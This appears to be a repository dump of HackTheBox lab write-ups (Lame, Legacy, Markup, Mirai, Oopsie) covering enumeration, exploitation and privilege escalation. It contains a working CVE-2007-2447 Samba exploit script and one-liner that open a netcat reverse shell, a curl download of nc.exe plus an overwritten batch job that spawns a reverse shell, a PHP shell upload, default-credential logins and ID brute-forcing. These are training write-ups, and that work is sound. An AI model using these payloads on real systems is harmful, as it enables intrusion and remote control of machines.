https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Laboratory/pics/vulnerability.png -------------------------------------------------------------------------------- /Lame/README.md: -------------------------------------------------------------------------------- 1 | ![](pics/logo.png) 2 | # Beginner Track - Lame 3 | 4 | ## Enumeration 5 | 6 | ``` 7 | rustscan 10.129.72.52 -- -sC -sV -o port_scan 8 | 9 | PORT STATE SERVICE VERSION 10 | 21/tcp open ftp vsftpd 2.3.4 11 | |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 12 | | ftp-syst: 13 | | STAT: 14 | | FTP server status: 15 | | Connected to 10.10.14.50 16 | | Logged in as ftp 17 | | TYPE: ASCII 18 | | No session bandwidth limit 19 | | Session timeout in seconds is 300 20 | | Control connection is plain text 21 | | Data connections will be plain text 22 | | vsFTPd 2.3.4 - secure, fast, stable 23 | |_End of status 24 | 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 25 | | ssh-hostkey: 26 | | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) 27 | |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 28 | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 29 | 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 30 | 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) 31 | Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 32 | ``` 33 | 34 | So we have an open FTP port (21) with Anonymous login allowed, an SSH port (22), open samba ports (139,445) and a distrubuted c/c++ compiler server on port 3632. 35 | 36 | ## Examine Port 21 - Anonymous allowed 37 | 38 | Connecting to the FTP server as client Anonymous works, however, the directory is completely empty. 39 | 40 | ``` 41 | ftp> ls -la 42 | 200 PORT command successful. Consider using PASV. 43 | 150 Here comes the directory listing. 44 | drwxr-xr-x 2 0 65534 4096 Mar 17 2010 . 45 | drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .. 46 | 226 Directory send OK. 47 | ``` 48 | 49 | ## Examine Port 139/445 50 | 51 | Let's start by enumerating the smb directories. 52 | ``` 53 | └──╼ $ smbmap -H 10.129.72.52 54 | [+] IP: 10.129.72.52:445 Name: 10.129.72.52 55 | Disk Permissions Comment 56 | ---- ----------- ------- 57 | print$ NO ACCESS Printer Drivers 58 | tmp READ, WRITE oh noes! 59 | opt NO ACCESS 60 | IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian)) 61 | ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))- 62 | WORKGROUP LAME 63 | ``` 64 | 65 | Apparently we have full read and write access to the `tmp` share. 66 | 67 | ``` 68 | └──╼ $ smbclient //10.129.72.52/tmp 69 | Enter WORKGROUP\ctf's password: 70 | Anonymous login successful 71 | Try "help" to get a list of possible commands. 72 | smb: \> dir 73 | . D 0 Wed Jan 6 13:57:48 2021 74 | .. DR 0 Sat Oct 31 08:33:58 2020 75 | .ICE-unix DH 0 Wed Jan 6 13:45:02 2021 76 | 5571.jsvc_up R 0 Wed Jan 6 13:46:17 2021 77 | vmware-root DR 0 Wed Jan 6 13:45:29 2021 78 | .X11-unix DH 0 Wed Jan 6 13:45:30 2021 79 | .X0-lock HR 11 Wed Jan 6 13:45:30 2021 80 | vgauthsvclog.txt.0 R 1600 Wed Jan 6 13:45:00 2021 81 | 82 | 7282168 blocks of size 1024. 5385876 blocks available 83 | ``` 84 | 85 | After investigating all the files, and finding nothing, I looked up if there are any known vulnerabilities for this specific Samba version (3.0.20). 86 | 87 | ``` 88 | searchsploit samba 3.0.20 89 | ``` 90 | 91 | ![](pics/searchsploit.png) 92 | 93 | ## Exploitation 94 | 95 | The one we need is the "Username" map script. There are two ways you can exploit this vulnerability. Either with metasploit, which runs the exploit without telling you what actually happens in the background OR do it manually and you learn every single step. But that's totally up to you. I decided to try the manual approach. 96 | 97 | Explanation of the vulnerability: 98 | 99 | CVE-2007-2447 - Samba usermap script 100 | Samba 3.0.0 - 3.0.25rc3 are subject for Remote Command Injection Vulnerability (CVE-2007-2447), allows remote attackers to execute arbitrary commands by specifying a username containing shell meta characters. 101 | 102 | The root cause is passing unfiltered user input provided via MS-RPC calls to /bin/sh when invoking non-default "username map script" configuration option in smb.conf, so no authentication is needed to exploit this vulnerability. 103 | 104 | To exploit this vulnerability, all you need to do is to change the username for authentication to your payload in combination with `nohup`. I wrote a short python script for that purpose. 105 | 106 | ```python 107 | #!/usr/bin/python 108 | 109 | import sys 110 | from smb.SMBConnection import SMBConnection 111 | 112 | def exploit(rhost, rport, lhost, lport): 113 | payload = 'nc -e /bin/bash 10.10.14.50 4444' 114 | username = "/=`nohup " + payload + "`" 115 | conn = SMBConnection(username, "", "", "") 116 | err = conn.connect(rhost, rport) 117 | if not err: 118 | print("[+] Done !") 119 | 120 | if __name__ == '__main__': 121 | print("[*] CVE-2007-2447 - Samba usermap script") 122 | if len(sys.argv) != 5: 123 | print("[-] usage: python " + sys.argv[0] + " ") 124 | else: 125 | print("[+] Connecting !") 126 | try: 127 | rhost = sys.argv[1] 128 | rport = int(sys.argv[2]) 129 | lhost = sys.argv[3] 130 | lport = int(sys.argv[4]) 131 | exploit(rhost, rport, lhost, lport) 132 | except ValueError: 133 | print("ERROR: Port must be an integer") 134 | exit(0) 135 | ``` 136 | 137 | Here we connect with the user set to our reverse shell payload. 138 | 139 | ``` 140 | └──╼ $ python3 exploit.py 10.129.72.52 139 10.10.14.50 4444 141 | [*] CVE-2007-2447 - Samba usermap script 142 | [+] Connecting ! 143 | [+] Done 144 | ``` 145 | 146 | This results in: 147 | 148 | ``` 149 | └──╼ $ nc -lvnp 4444 150 | listening on [any] 4444 ... 151 | connect to [10.10.14.50] from (UNKNOWN) [10.129.72.52] 43267 152 | id 153 | uid=0(root) gid=0(root) 154 | ``` 155 | 156 | An alternative would be to use smbclient to connect to the tmp share. 157 | 158 | Afterwards type following: 159 | 160 | ``` 161 | smb: \> logon "/=`nohup nc -e /bin/bash 10.10.14.50 4444`" 162 | ``` 163 | This is the manual approach without a script. 164 | 165 | ## Post Exploitation 166 | 167 | Now we can obtain the userflag (/home/makis/user.txt) and the rootflag (/root/root.txt) -------------------------------------------------------------------------------- /Lame/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Lame/pics/logo.png -------------------------------------------------------------------------------- /Lame/pics/searchsploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Lame/pics/searchsploit.png -------------------------------------------------------------------------------- /Legacy/README.md: -------------------------------------------------------------------------------- 1 | 2 | ![](pics/logo.png) 3 | 4 | # Legacy (Windows) 5 | 6 | ## Enumeration 7 | 8 | ``` 9 | rustscan 10.129.79.117 -- -sC -sV -o port_scan 10 | 11 | PORT STATE SERVICE VERSION 12 | 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 13 | 445/tcp open microsoft-ds Windows XP microsoft-ds 14 | 3389/tcp closed ms-wbt-server 15 | Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp 16 | 17 | Host script results: 18 | |_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s 19 | |_nbstat: NetBIOS name: nil, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:41:6a (VMware) 20 | | smb-os-discovery: 21 | | OS: Windows XP (Windows 2000 LAN Manager) 22 | | OS CPE: cpe:/o:microsoft:windows_xp::- 23 | | Computer name: legacy 24 | | NetBIOS computer name: LEGACY\x00 25 | | Workgroup: HTB\x00 26 | |_ System time: 2021-01-18T17:21:39+02:00 27 | | smb-security-mode: 28 | | account_used: 29 | | authentication_level: user 30 | | challenge_response: supported 31 | |_ message_signing: disabled (dangerous, but default) 32 | |_smb2-time: Protocol negotiation failed (SMB2) 33 | 34 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 35 | ``` 36 | 37 | Both SMB ports, 139 & 445, are open. So this is again a machine with an SMB challenge/vulnerability. 38 | 39 | By running the default nmap scripts (-sC), we can already see that it's a machine with a rather old OS (Windows XP with Windows 2000 LAN Manager). This might be the reason why this machine is called `Legacy`. Let's further investigate that. 40 | 41 | ## Exploitation 42 | 43 | Googling for "`windows xp windows 2000 manager vulnerability`", we literally get hundreds of results all pointing towards `MS08-067 - Critical: Vulnerability in Server Service Could Allow Remote Code Execution`. 44 | 45 | Using searchsploit, we also get a list of already existing exploits for this vulnerability. 46 | 47 | Therefore, I decided to use metasploit, to make things easier (this time at least). 48 | 49 | ![](pics/metasploit_ms08-067.png) 50 | 51 | Metasploit already offers us a module for this vulnerability. Let's use it! 52 | 53 | Settings should be defined as follows (insert your IP into LHOST): 54 | 55 | ![](pics/module_options.png) 56 | 57 | After exeucting the exploit, we receive a meterpreter shell: 58 | 59 | ![](pics/system_shell.png) 60 | 61 | Now what's left is to obtain the user and root flag. 62 | There are several way how to do that. I decided to go for the simply `shell` spawn and search for them manually. 63 | 64 | ## Post Exploitation 65 | 66 | User Flag: 67 | ``` 68 | C:\Documents and Settings\john\Desktop>type user.txt 69 | type user.txt 70 | e69af0e4f443de7e36876fda4ec7644f 71 | ``` 72 | 73 | Root Flag: 74 | ``` 75 | C:\Documents and Settings\Administrator\Desktop>type root.txt 76 | type root.txt 77 | 993442d258b0e0ec917cae9e695d5713 78 | ``` -------------------------------------------------------------------------------- /Legacy/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Legacy/pics/logo.png -------------------------------------------------------------------------------- /Legacy/pics/metasploit_ms08-067.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Legacy/pics/metasploit_ms08-067.png -------------------------------------------------------------------------------- /Legacy/pics/module_options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Legacy/pics/module_options.png -------------------------------------------------------------------------------- /Legacy/pics/system_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Legacy/pics/system_shell.png -------------------------------------------------------------------------------- /Markup/README.md: -------------------------------------------------------------------------------- 1 | # Starting Point - Markup 2 | 3 | ## Enumeration 4 | 5 | ``` 6 | rustscan 10.10.10.49 -- -sC -sV -o port_scan 7 | 8 | PORT STATE SERVICE REASON 9 | 22/tcp open ssh syn-ack 10 | 80/tcp open http syn-ack 11 | 443/tcp open https syn-ack 12 | ``` 13 | 14 | ### Examine Port 80 - Apache Server 15 | 16 | ![](pics/login.png) 17 | 18 | When accessing the open port 80 via a browser, we can see a login page. In the previous machine (Included), we found the credentials `Daniel:>SNDv*2wzLWf` stored in a SQL dump. Using them, we can successfully login and we are redirected to the application's website, which seems to be some kind of online store / delivery service. 19 | ![](pics/delivery.png) 20 | 21 | The website provides several functionalities, one of which is for submitting orders. 22 | 23 | ![](pics/order.png) 24 | 25 | When submitting an order (with test data), and intercepting the request with Burpsuite, we can see that the content is XML. 26 | 27 | ![](pics/burp-order.png) 28 | 29 | There is a good chance of an XXE (XML External Entity) vulnerability. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. 30 | 31 | Let's try it: 32 | 33 | ![](pics/xxe_proof.png) 34 | 35 | Perfect! It works. 36 | 37 | Now what can we do? We know that there is an open SSH port. And we also know that `Daniel` is a valid user. Maybe we can leak the private SSH key and use it to connect to the server. 38 | 39 | ![](pics/ssh_key_leak.png) 40 | 41 | Using this key as the identitfier for the ssh connection we get access to the machine! 42 | 43 | ``` 44 | Microsoft Windows [Version 10.0.17763.107] 45 | (c) 2018 Microsoft Corporation. All rights reserved. 46 | 47 | daniel@MARKUP C:\Users\daniel>whoami 48 | markup\daniel 49 | ``` 50 | 51 | ## Exploitation 52 | 53 | Enumerating the system, reveals a script named `job.bat` which is located in the `C:\Log-Management` directory: 54 | 55 | ``` 56 | daniel@MARKUP C:\Log-Management>type job.bat 57 | @echo off 58 | FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V 59 | IF (%adminTest%)==(Access) goto noAdmin 60 | for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G") 61 | echo. 62 | echo Event Logs have been cleared! 63 | goto theEnd 64 | :do_clear 65 | wevtutil.exe cl %1 66 | goto :eof 67 | :noAdmin 68 | echo You must run this script as an Administrator! 69 | :theEnd 70 | exit 71 | ``` 72 | 73 | Looking at the permissions, we see that the group `BUILTIN\Users` has full control (F) over the file. This also includes our current user daniel. 74 | 75 | ``` 76 | daniel@MARKUP C:\Log-Management>icacls job.bat 77 | job.bat BUILTIN\Users:(F) 78 | NT AUTHORITY\SYSTEM:(I)(F) 79 | BUILTIN\Administrators:(I)(F) 80 | BUILTIN\Users:(I)(RX) 81 | ``` 82 | 83 | The idea is to replace the current code with a reverse shell, which will then be executed by an administrator (similar to cron jobs on unix). But therefore, we first must upload the nc.exe so that we can establish a reverse shell. 84 | 85 | ``` 86 | curl http://10.10.14.15/nc.exe -o c:\users\daniel\nc.exe 87 | 88 | echo C:\Users\daniel\nc.exe -e cmd.exe 10.10.14.15 4444 > C:\Log-Management\job.bat 89 | ``` 90 | 91 | Now we wait and eventually receive a root-shell: 92 | 93 | ![](pics/rootshell.png) 94 | 95 | Final step is to obtain the root flag: `f574a3e7650cebd8c39784299cb570f8` 96 | -------------------------------------------------------------------------------- /Markup/pics/burp-order.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/burp-order.png -------------------------------------------------------------------------------- /Markup/pics/delivery.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/delivery.png -------------------------------------------------------------------------------- /Markup/pics/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/login.png -------------------------------------------------------------------------------- /Markup/pics/order.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/order.png -------------------------------------------------------------------------------- /Markup/pics/rootshell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/rootshell.png -------------------------------------------------------------------------------- /Markup/pics/ssh_key_leak.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/ssh_key_leak.png -------------------------------------------------------------------------------- /Markup/pics/xxe_proof.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Markup/pics/xxe_proof.png -------------------------------------------------------------------------------- /Mirai/README.md: -------------------------------------------------------------------------------- 1 | ![](pics/logo.png) 2 | 3 | # Mirai (Linux) 4 | 5 | ## Enumeration 6 | 7 | ``` 8 | rustscan --ulimit 5000 10.129.82.32 -- -sV -o port_scan 9 | 10 | PORT STATE SERVICE REASON VERSION 11 | 22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) 12 | 53/tcp open domain syn-ack dnsmasq 2.76 13 | 80/tcp open http syn-ack lighttpd 1.4.35 14 | 1879/tcp open upnp syn-ack Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) 15 | 32400/tcp open http syn-ack Plex Media Server httpd 16 | 32469/tcp open upnp syn-ack Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) 17 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 18 | ``` 19 | 20 | ### Examine Port 80 - lighttpd Server 21 | 22 | Accessing port 80 via the browser, leaves us with an empty page. Using gobuster we discover an interesting directory as well as a javascript file. 23 | 24 | ``` 25 | └──╼ $ gobuster dir -u "10.129.82.32" -w /usr/share/wordlists/dirb/common.txt 26 | =============================================================== 27 | Gobuster v3.0.1 28 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 29 | =============================================================== 30 | [+] Url: http://10.129.82.32 31 | [+] Threads: 10 32 | [+] Wordlist: /usr/share/wordlists/dirb/common.txt 33 | [+] Status codes: 200,204,301,302,307,401,403 34 | [+] User Agent: gobuster/3.0.1 35 | [+] Timeout: 10s 36 | =============================================================== 37 | 2021/01/19 12:48:53 Starting gobuster 38 | =============================================================== 39 | /admin (Status: 301) 40 | /swfobject.js (Status: 200) 41 | =============================================================== 42 | 2021/01/19 12:49:18 Finished 43 | =============================================================== 44 | ``` 45 | 46 | Taking a look at the admin directory (via the browser), we see the default config page for Pi-hole. 47 | 48 | ![](pics/admin_website.png) 49 | 50 | Pi-hole is a Linux network-level advertisement and Internet tracker blocking application which acts as a DNS sinkhole and optionally a DHCP server, intended for use on a private network. 51 | 52 | ## Gaining an Initial Foothold 53 | 54 | As Pi-holes are usually installed on a Raspberry Pi, I tried to login as the default user via ssh (pi:raspberry). And it worked! 55 | 56 | ``` 57 | pi@raspberrypi:~ $ id 58 | uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi) 59 | ``` 60 | 61 | ## Privilege Escalation 62 | 63 | We also see that pi is in the sudo group. 64 | 65 | ``` 66 | pi@raspberrypi:~ $ sudo -l 67 | Matching Defaults entries for pi on localhost: 68 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 69 | 70 | User pi may run the following commands on localhost: 71 | (ALL : ALL) ALL 72 | (ALL) NOPASSWD: ALL 73 | ``` 74 | 75 | So gaining a root shell is also very easy: 76 | 77 | ``` 78 | pi@raspberrypi:~ $ su - 79 | Password: raspberry 80 | 81 | SSH is enabled and the default password for the 'pi' user has not been changed. 82 | This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. 83 | 84 | 85 | SSH is enabled and the default password for the 'pi' user has not been changed. 86 | This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. 87 | 88 | root@raspberrypi:~# id 89 | uid=0(root) gid=0(root) groups=0(root) 90 | ``` 91 | 92 | So basically we have pwned the machine. Atleast that's what I thought. When trying to read the root flag it states: 93 | 94 | ``` 95 | root@raspberrypi:~# cat /root/root.txt 96 | I lost my original root.txt! I think I may have a backup on my USB stick... 97 | ``` 98 | 99 | Hm ok... Let's inspect the various filesystems on the machine to see if we can find something interesting: 100 | 101 | ``` 102 | root@raspberrypi:~# df -h 103 | Filesystem Size Used Avail Use% Mounted on 104 | aufs 8.5G 2.8G 5.3G 34% / 105 | tmpfs 100M 4.8M 96M 5% /run 106 | /dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1 107 | /dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs 108 | tmpfs 250M 0 250M 0% /lib/live/mount/overlay 109 | /dev/sda2 8.5G 2.8G 5.3G 34% /lib/live/mount/persistence/sda2 110 | devtmpfs 10M 0 10M 0% /dev 111 | tmpfs 250M 8.0K 250M 1% /dev/shm 112 | tmpfs 5.0M 4.0K 5.0M 1% /run/lock 113 | tmpfs 250M 0 250M 0% /sys/fs/cgroup 114 | tmpfs 250M 8.0K 250M 1% /tmp 115 | /dev/sdb 8.7M 93K 7.9M 2% /me 116 | ``` 117 | 118 | We see the filesystem /dev/sdb which has been mounted on /media/usbstick. A USBSTICK! That's what we are looking for. 119 | 120 | ``` 121 | root@raspberrypi:/media/usbstick# ls 122 | damnit.txt lost+found 123 | root@raspberrypi:/media/usbstick# cat damnit.txt 124 | Damnit! Sorry man I accidentally deleted your files off the USB stick. 125 | Do you know if there is any way to get them back? 126 | 127 | -James 128 | ``` 129 | 130 | Hmm... So what now? Maybe we are lucky and the files are deleted but not yet overwritten. A further assumption is, that the flag is a human readable string as in the other challenges. If so, we can try to run `strings` on `/dev/sdb` to see if the flag is still in memory. 131 | 132 | ``` 133 | root@raspberrypi:~# strings /dev/sdb 134 | >r & 135 | /media/usbstick 136 | lost+found 137 | root.txt 138 | damnit.txt 139 | >r & 140 | >r & 141 | /media/usbstick 142 | lost+found 143 | root.txt 144 | damnit.txt 145 | >r & 146 | /media/usbstick 147 | 2]8^ 148 | lost+found 149 | root.txt 150 | damnit.txt 151 | >r & 152 | 3d3e483143ff12ec505d026fa13e020b 153 | Damnit! Sorry man I accidentally deleted your files off the USB stick. 154 | Do you know if there is any way to get them back? 155 | -James 156 | ``` 157 | 158 | There it is! A suspicious string that looks like a flag. Let's try to submit it ... And it works! Machine pwned! 159 | 160 | 161 | 162 | -------------------------------------------------------------------------------- /Mirai/pics/admin_website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Mirai/pics/admin_website.png -------------------------------------------------------------------------------- /Mirai/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Mirai/pics/logo.png -------------------------------------------------------------------------------- /Oopsie/README.md: -------------------------------------------------------------------------------- 1 | # Starting Point - Oopsie 2 | 3 | ## Enumeration 4 | ``` 5 | rustscan 10.10.10.28 -- -sC -sV 6 | 7 | PORT STATE SERVICE REASON VERSION 8 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 9 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) 10 | | http-methods: 11 | |_ Supported Methods: GET HEAD POST OPTIONS 12 | |_http-server-header: Apache/2.4.29 (Ubuntu) 13 | |_http-title: Welcome 14 | ``` 15 | 16 | ### Examine Port 80 - Apache server 17 | 18 | ![website](pics/apache_website.png) 19 | 20 | It seems to be a website for the electric vehicle manufacturer MegaCorp (which we also had in the previous Task "Archetype"). 21 | 22 | ![login_hint](pics/hint_login.png) 23 | 24 | Scrolling down the website, we find a hint for a login page. As the website UI does not provide any login functionality, we have probably have to find it first. Therefore, we open Burpsuite and check the sitemap of the website. Alternatively we could also use a tool like `gobuster`or `dirbuster` for this as well. 25 | 26 | ![sitemap](pics/burpsuite_sitemap.png) 27 | 28 | The sitemap reveals that there is a directory called `/cdn-cgi/login/` and the related `/cdn-cgi/login/index.php`. 29 | 30 | ![login_page](pics/login_page.png) 31 | 32 | Opening this file via the webbrowser, we can confirm that this is a login page. 33 | 34 | The next step is to bruteforce the username/password and hope that it is weak. However, using `Hydra` or `Burpsuite Intruder` led to nothing, as the username/password combiniation is unfortunately not included in a common wordlist like `rockyou.txt`. I was pretty much stuck at this point and after a while, I looked it up in a writeup. The password is `MEGACORP_4dm1n!!` (from the previous challenge ... never would have thought of that) and a weak username. 35 | 36 | ![logged_in](pics/logged_in.png) 37 | 38 | Once logged in, we have full access (as we are admin) to the Repair Management System website. 39 | 40 | ![accoun](pics/accounting.png) 41 | 42 | We have access to the account information of the admin (Access ID: 34322, Name: admin, Email: admin@megacorp.com) 43 | 44 | ![branding](pics/branding.png) 45 | 46 | We have information about the Branding. 47 | 48 | ![clients](pics/clients.png) 49 | 50 | As well as information about clients. 51 | 52 | ![uploads](pics/uploads.png) 53 | 54 | But when we try to access the `Uploads`, it says we require super admin rights. Hmmm .... 55 | 56 | After investigating all the source code and the network communication, I realized that when logging in as admin, two cookies are being set. 57 | 58 | ![](pics/cookies.png) 59 | 60 | 1) `user=34322; expires=Sat, 30-Jan-2021 14:17:15 GMT; Max-Age=2592000; path=/` 61 | 2) `role=admin; expires=Sat, 30-Jan-2021 14:17:15 GMT; Max-Age=2592000; path=/` 62 | 63 | So apparently, the user- and role-management is done via plaintext cookies. Great idea! (sarcasm off). Perfect chance for us to gain super admin privileges. I quickly realized that the `user=34322` part seemed to be familiar. We have seen that number before on the admin's account info page. It's the Access ID of the admin. 64 | 65 | 66 | ![uploads](pics/accounts_uri.png) 67 | 68 | Going back to the account info page, I realized that there is an `id` parameter in the URL. 1 seems to be the Admin. Can we get information about the super admin user, if we can guess its id? Let's try that. 69 | 70 | We have several options for that: 71 | 72 | 1) Burpsuite Sniper 73 | 2) Hydra 74 | 3) Writing a script (requesting the URLs and check the content) 75 | 76 | ![burpsuite_sniper](pics/burpsuite_sniper.png) 77 | 78 | With Burpsuite it's fairly easy to do. Simply intercept the response to the Account info page, send it to the Intruder, select `Sniper` and add the `id` value to the fields that should be bruteforced. After that, simply set the payload to a list of integers (e.g 0-1000). 79 | 80 | However, I decided to practice my Python skills and write my own script for that. 81 | 82 | ```python 83 | import requests 84 | url = "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=" 85 | 86 | print("[+] Starting the process") 87 | 88 | payload = { 89 | 'username' : 'admin', 90 | 'password' : 'MEGACORP_4dm1n!!' 91 | } 92 | 93 | with requests.Session() as s: 94 | p = s.post('http://10.10.10.28/cdn-cgi/login/index.php', data=payload) 95 | for x in range(1000): 96 | print(f"[+] Testing id: {x}") 97 | test_url = url + str(x) 98 | res = s.get(test_url) 99 | if 'super' in res.text: 100 | print(f"[+] SUPER ADMIN ID FOUND: {x}") 101 | break 102 | 103 | print("[+] Stopping the process") 104 | ``` 105 | 106 | Running the code, will tell us that Super Admin ID is 30, as the response contains the word `super` (This obviously only works, as I've assumed that super is somewhere contained in the response. If that were not the case, then the script wouldn't work and I would have to go through each request manually or check for other words/find a regex to match the account id). 107 | 108 | ![super_admin_info](pics/super_admin_info.png) 109 | 110 | Looking at the page with the `id` parameter set to 30, we can see the account info of the super admin user. The access ID is `86575`. We change our cookie accordingly and now try to access the `Uploads` page. It works! 111 | 112 | ![uploads_page](pics/uploads_page.png) 113 | 114 | Trying to upload a php shell called `shell.php` succeeds. 115 | 116 | ![shell_upload](pics/upload_shell.png) 117 | 118 | During our sitemap-enumaration with Burpsuite, we found a directory called `/uploads`. It probably contains the uploaded file. 119 | 120 | ![shell](pics/shell.png) 121 | 122 | Starting a listener on port 4444 with `nc -lvnp 4444`and then accessing the file on `10.10.10.28/uploads/shell.php`, gives us a reverse shell to the machine. 123 | 124 | First step is always to stablize the shell, so that we can't accidently close the connection if we press something like CTRL+C. 125 | 126 | To fully stablize the shell and enable features like autocomplete we can do following: 127 | ``` 128 | python3 -c 'import pty; pty.spawn("/bin/bash")' 129 | 130 | CTRL + Z (to put the nc process into the background) 131 | 132 | stty raw -echo; fg 133 | ``` 134 | 135 | Now you should have a fully stablized shell. 136 | 137 | ## On-Machine Enumeration 138 | 139 | ### Other home directories 140 | 141 | ``` 142 | www-data@oopsie:/home$ ls -la 143 | total 12 144 | drwxr-xr-x 3 root root 4096 Jan 23 2020 . 145 | drwxr-xr-x 24 root root 4096 Jan 27 2020 .. 146 | drwxr-xr-x 5 robert robert 4096 Feb 25 2020 robert 147 | ``` 148 | Inspecting the home directories, we can see another user called `robert`. His home directory contains the `user.txt` flag. 149 | 150 | | f2c74ee8db7983851ab2a96a44eb7981 | 151 | 152 | ### Files with SUID 153 | 154 | ``` 155 | www-data@oopsie:/$ find / -perm -u=s -type f 2>/dev/null | grep -v "snap" 156 | /bin/fusermount 157 | /bin/umount 158 | /bin/mount 159 | /bin/ping 160 | /bin/su 161 | /usr/lib/dbus-1.0/dbus-daemon-launch-helper 162 | /usr/lib/openssh/ssh-keysign 163 | /usr/lib/eject/dmcrypt-get-device 164 | /usr/lib/policykit-1/polkit-agent-helper-1 165 | /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic 166 | /usr/bin/newuidmap 167 | /usr/bin/passwd 168 | /usr/bin/at 169 | /usr/bin/bugtracker <-- seems suspicious 170 | /usr/bin/newgrp 171 | /usr/bin/pkexec 172 | /usr/bin/chfn 173 | /usr/bin/chsh 174 | /usr/bin/traceroute6.iputils 175 | /usr/bin/newgidmap 176 | /usr/bin/gpasswd 177 | /usr/bin/sudo 178 | ``` 179 | 180 | `-perm -u=s`: Permission, where SUID Bit is set 181 | 182 | `-type f` : Only show files 183 | 184 | `2>/dev/null`: Dump any error message in /dev/null 185 | 186 | `grep -v snap`: remove all findings that contain snap (avoids a lot of spamming) 187 | 188 | ``` 189 | www-data@oopsie:/$ ls -la /usr/bin/bugtracker 190 | -rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker 191 | ``` 192 | However, we have no access to the file. So this is a dead end. 193 | 194 | ### Check www-data files of the website 195 | 196 | We should probably check out the other files of the website. Maybe we have missed something. And indeed! There is a `db.php` file containing credentials for the user `robert` which we've already found. 197 | 198 | ``` 199 | www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php 200 | 203 | ``` 204 | 205 | So let's try to gain access to the user `robert` with the password `M3g4C0rpUs3r!`. And it works! 206 | 207 | ``` 208 | robert@oopsie:/var/www/html/cdn-cgi/login$ id 209 | 